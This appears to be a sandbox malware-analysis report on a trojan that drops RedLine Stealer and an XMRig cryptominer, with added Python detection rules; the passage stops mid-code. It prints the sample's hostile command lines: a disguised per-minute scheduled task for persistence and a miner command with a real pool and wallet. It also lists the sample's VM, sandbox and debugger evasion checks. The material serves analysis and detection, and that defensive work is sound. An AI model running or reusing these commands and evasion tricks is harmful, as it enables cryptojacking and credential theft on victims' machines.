              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (3 identical events)
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | System information queried: FirmwareTableInformation
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | System information queried: FirmwareTableInformation
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              (the ACPI DSDT key named VBOX__ exists only on VirtualBox guests; opening it is a plain existence test)
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | RDTSC instruction interceptor: first address 000000000176B6D7, second address 000000000176B6E3; instructions: 0x00000000 rdtsc; 0x00000002 movzx edx, ax; 0x00000005 bts edx, edx; 0x00000008 xor bl, cl; 0x0000000a rcl dl, cl; 0x0000000c rdtsc
              (two rdtsc reads bracket a short filler sequence; an unexpectedly large cycle delta points at a hypervisor trapping rdtsc or at single-stepping)
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc (Display adapters device class; DriverDesc names the GPU driver and so reveals a hypervisor's virtual adapter)
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} (device interface path of the VMware virtual SATA CD-ROM; the NECVMWar vendor string is a VMware marker)
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Thread delayed: delay time: 922337203685477
              (922337203685477 ms is .NET TimeSpan.MaxValue expressed in milliseconds, i.e. an effectively infinite sleep)
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe TID: 5440 | Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe TID: 4920 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe TID: 6660 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (3 identical events)
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285098364.0000000006360000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_
              Source: RantimeBroker.exe, 0000000F.00000003.317125414.00000000015F0000.00000004.00000001.sdmp | Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
              Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
              Source: RantimeBroker.exe, 0000000F.00000003.317400847.00000000015F0000.00000004.00000001.sdmp | Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
              Source: RantimeBroker.exe, 0000000F.00000003.316725149.00000000015F0000.00000004.00000001.sdmp | Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
              Source: RantimeBroker.exe, 0000000F.00000003.316864876.00000000015F0000.00000004.00000001.sdmp | Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
              Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW0@5
              Source: RantimeBroker.exe, 0000000F.00000003.317206080.00000000015F0000.00000004.00000001.sdmp | Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
              Source: cpu.exe, 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWuX
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | System information queried: ModuleInformation
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process information queried: ProcessInformation

              Anti Debugging:

              Hides threads from debuggers
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Thread information set: HideFromDebugger
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              (the six names above are the window classes and titles of Sysinternals Regmon, Filemon and Process Monitor, looked up by title or class name)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process queried: DebugPort (2 events)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process queried: DebugObjectHandle
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Process queried: DebugPort (2 events)
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Process queried: DebugObjectHandle
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process queried: DebugPort (2 events)
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process queried: DebugObjectHandle
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Process queried: DebugPort (2 events)
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | Process queried: DebugObjectHandle
              (DebugPort and DebugObjectHandle are the ProcessDebugPort and ProcessDebugObjectHandle information classes of NtQueryInformationProcess; a non-zero result means a debugger is attached)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Process token adjusted: Debug
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process token adjusted: Debug
              (i.e. SeDebugPrivilege enabled on the process token)
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Memory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
              (a task named to pass as a Microsoft service that relaunches RantimeBroker.exe from the user profile every minute; /f silently overwrites an existing task of the same name)
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
              (an XMRig command line: Stratum pool pool.minexmr.com on TCP 4444, CryptoNight-R (cn/r), a 95-character Monero address as the -u user, 1% developer donation)
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp | Binary or memory string: Progman
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
              Source: cpu.exe, 00000010.00000002.547811557.0000020FCC7B0000.00000002.00000001.sdmp, conhost.exe, 00000011.00000002.534797835.000001F5082A0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical events)
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\zmql3v0y.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
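              The evasion and process-creation events above are exactly the telemetry a host-based rule consumes. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample, that runs three rules over constructed Sysmon-like events: the ACPI\DSDT\VBOX__ registry probe, the one-minute schtasks task pointing into the user profile, and the XMRig command line. The two malicious command lines reuse the values listed in this section; the event field names, the benign control task, the interval threshold and the user-writable path list are assumptions made for the example.

```python
"""Endpoint detection over constructed Sysmon-like events (added example).

Rules: VBOX__ ACPI registry probe (anti-VM), minute-interval schtasks task
launching from a user-writable path (persistence), XMRig command line
(cryptominer IOC extraction)."""
import re
from urllib.parse import urlparse

# Constructed telemetry. Field names are an assumption; the two malicious
# command lines reuse the values the report lists above.
EVENTS = [
    {"type": "registry_open",
     "image": r"C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe",
     "key": r"HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__"},
    {"type": "process_create",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 '
                r'/tn "Windows Service Microsoft Corporation" '
                r'/tr "C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe" /f'},
    {"type": "process_create",
     "image": r"C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe",
     "cmdline": r'"C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe" '
                r"-o stratum+tcp://pool.minexmr.com:4444 --algo cn/r "
                r"-u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ "
                r"--donate-level=1"},
    # Benign control (constructed): a daily task under Program Files must not fire.
    {"type": "process_create",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /sc DAILY /tn Backup /tr "C:\Program Files\Backup\backup.exe"'},
]

# Registry substrings that only exist on VirtualBox guests (the report shows DSDT\VBOX__).
VM_REGISTRY_MARKERS = (r"\acpi\dsdt\vbox__",)
# Assumed user-writable locations a scheduled task should not launch from.
USER_WRITABLE = ("\\appdata\\", "\\temp\\")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def parse_switches(argv, value_switches):
    """Map switches to values: switches in value_switches consume the next token,
    --key=value is split, any other /x or -x token is recorded as a flag (True)."""
    opts, i = {}, 1                       # argv[0] is the image path
    while i < len(argv):
        tok = argv[i]
        low = tok.lower()
        if low.startswith("--") and "=" in low:
            key, val = tok.split("=", 1)
            opts[key.lower()] = val
        elif low in value_switches and i + 1 < len(argv):
            opts[low] = argv[i + 1]
            i += 1
        elif low.startswith(("/", "-")):
            opts[low] = True
        i += 1
    return opts


def rule_vm_registry(ev):
    if ev["type"] != "registry_open":
        return None
    if any(marker in ev["key"].lower() for marker in VM_REGISTRY_MARKERS):
        return {"rule": "anti_vm_registry_check", "image": ev["image"], "key": ev["key"]}
    return None


def rule_minute_task(ev):
    if ev["type"] != "process_create" or not ev["image"].lower().endswith("\\schtasks.exe"):
        return None
    o = parse_switches(split_cmdline(ev["cmdline"]), {"/sc", "/mo", "/tn", "/tr"})
    if "/create" not in o or str(o.get("/sc", "")).upper() != "MINUTE":
        return None
    try:
        every = int(o.get("/mo", 1))      # schtasks defaults /mo to 1 for MINUTE
    except ValueError:
        return None
    target = str(o.get("/tr", "")).lower()
    if every <= 5 and any(p in target for p in USER_WRITABLE):   # 5-minute threshold assumed
        return {"rule": "minute_scheduled_task_from_user_path", "every_min": every,
                "task": o.get("/tn"), "target": o.get("/tr")}
    return None


def rule_miner_cmdline(ev):
    if ev["type"] != "process_create":
        return None
    o = parse_switches(split_cmdline(ev["cmdline"]),
                       {"-o", "--url", "-u", "--user", "-a", "--algo", "-p", "--pass"})
    pool = o.get("-o") or o.get("--url")
    if not isinstance(pool, str) or not pool.lower().startswith("stratum+"):
        return None
    url = urlparse(pool)                  # netloc is split for any scheme followed by //
    user = o.get("-u") or o.get("--user")
    wallet = user.split(".")[0] if isinstance(user, str) else None   # drop ".worker" suffix
    return {"rule": "cryptominer_cmdline", "image": ev["image"],
            "pool_host": url.hostname, "pool_port": url.port,
            "algo": o.get("--algo") or o.get("-a"), "wallet": wallet,
            "donate_level": o.get("--donate-level")}


RULES = (rule_vm_registry, rule_minute_task, rule_miner_cmdline)


def detect(events):
    """Run every rule over every event; findings come back in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

              The miner rule keys on the stratum+ scheme rather than on the binary name, since cpu.exe is a rename of XMRig; the extracted pool host, port and wallet are the indicators worth pivoting on across other hosts.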

              Stealing of Sensitive Information:

              Yara detected RedLine Stealer
              Source: Yara match | File source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY (2 matches; process 00000004 is pg2bsuqa.exe, see Unpacked PE Files below)

              Remote Access Functionality:

              Yara detected RedLine Stealer
              Source: Yara match | File source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Columns are tactics, cells are techniques; bracketed figures reproduce the superscript markers the original matrix attaches to techniques matched by this analysis. Cells without a marker are the unmatched matrix template.

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation [1] | Windows Service [1] | Windows Service [1] | Masquerading [1] | OS Credential Dumping | Query Registry [1] | Remote Services | Archive Collected Data [1] | Exfiltration Over Other Network Medium | Web Service [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Scheduled Task/Job [1] | Scheduled Task/Job [1] | Process Injection [12] | Virtualization/Sandbox Evasion [44] | LSASS Memory | Security Software Discovery [721] | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel [12] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Scheduled Task/Job [1] | Disable or Modify Tools [1] | Security Account Manager | Virtualization/Sandbox Evasion [44] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port [1] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection [12] | NTDS | Process Discovery [2] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer [2] | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information [2] | LSA Secrets | Remote System Discovery [1] | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol [3] | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing [12] | Cached Domain Credentials | System Network Configuration Discovery [1] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol [4] | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Timestomp [1] | DCSync | File and Directory Discovery [1] | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery [113] | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

              Behavior Graph

              Behavior Graph ID: 356837 | Sample: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Start date: 23/02/2021 | Architecture: WINDOWS | Score: 100

              Analysis-wide: contacted api.ip.sb, whois.iana.org and 2 other IPs or domains. Signatures: Sigma detected: Xmrig; Found malware configuration; Antivirus detection for URL or domain; 10 other signatures.

              Process tree as drawn in the graph (the two numbers after a process name are the graph's counters for created registry values and created files; node and edge ids from the rendering are dropped):

              SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe (15, 6)
                Network: iplogger.org 88.99.66.31:443 (local ports 49719, 49730), HETZNER-ASDE, Germany; pastebin.com 104.23.99.190:443 (49720), CLOUDFLARENETUS, United States; blog.agencia10x.com 172.67.213.210:443 (49721), CLOUDFLARENETUS, United States
                Dropped: C:\Users\user\AppData\Local\zmql3v0y.exe (PE32); C:\Users\user\AppData\Local\pg2bsuqa.exe (PE32); SecuriteInfo.com.T...54886.17334.exe.log (ASCII)
                Signatures: Detected unpacking (changes PE section rights); Query firmware table information (likely to detect VMs); Hides threads from debuggers
                +-- zmql3v0y.exe (14, 10)
                      Network: 195.2.84.91:80 (49729), ZENON-AS Moscow Russia RU, Russian Federation; iplogger.org
                      Dropped: C:\Users\user\AppData\...\RantimeBroker.exe (PE32); C:\Users\user\AppData\Roaming\...\cpu.exe (PE32+); C:\Users\user\AppData\...\WinRing0x64.sys (PE32+); C:\Users\user\AppData\Roaming\...\config.json (ASCII)
                      Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 3 other signatures
                      +-- cpu.exe (1)
                            Network: pool.minexmr.com 88.99.193.240:4444 (49731), HETZNER-ASDE, Germany; Detected Stratum mining protocol on this connection
                            Signatures: Multi AV Scanner detection for dropped file; Query firmware table information (likely to detect VMs)
                            +-- conhost.exe
                      +-- schtasks.exe (1)
                            +-- conhost.exe
                +-- pg2bsuqa.exe (14, 2)
                      Signatures: Query firmware table information (likely to detect VMs); Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements
              RantimeBroker.exe (1), started separately from the sample (the scheduled task created by zmql3v0y.exe points at this path)
                Signatures: Multi AV Scanner detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (window names); Tries to detect sandboxes / dynamic malware analysis system (registry check)
              RantimeBroker.exe (second instance, no further events attached in the graph)
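              "Detected Stratum mining protocol" on the pool.minexmr.com:4444 connection refers to the newline-delimited JSON-RPC dialect XMRig speaks: the client opens with a login message carrying the wallet, and the pool replies with a job. The Python below is an added example, not code from the report or from XMRig, that parses a constructed login/job exchange in that shape and scores the flow. The wallet string is the one from the cpu.exe command line in this report; the agent version, job id, blob, target, the negative-control HTTP traffic and the port allow-list are made up.

```python
"""Network-side view of a Stratum (XMRig JSON-RPC) flow (added example).

A miner's first message is "login" with the wallet; the pool answers with a
"job". Seeing both on one TCP flow is a confirmed mining session."""
import json

# Wallet as listed in the report's cpu.exe command line.
WALLET = "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j"

# Constructed client -> pool login; agent version and algo list are assumptions.
CLIENT_LOGIN = json.dumps({
    "id": 1, "jsonrpc": "2.0", "method": "login",
    "params": {"login": WALLET, "pass": "x", "agent": "XMRig/6.7.2", "algo": ["cn/r", "rx/0"]},
}).encode() + b"\n"

# Constructed pool -> client reply; id, blob, job_id and target are placeholders.
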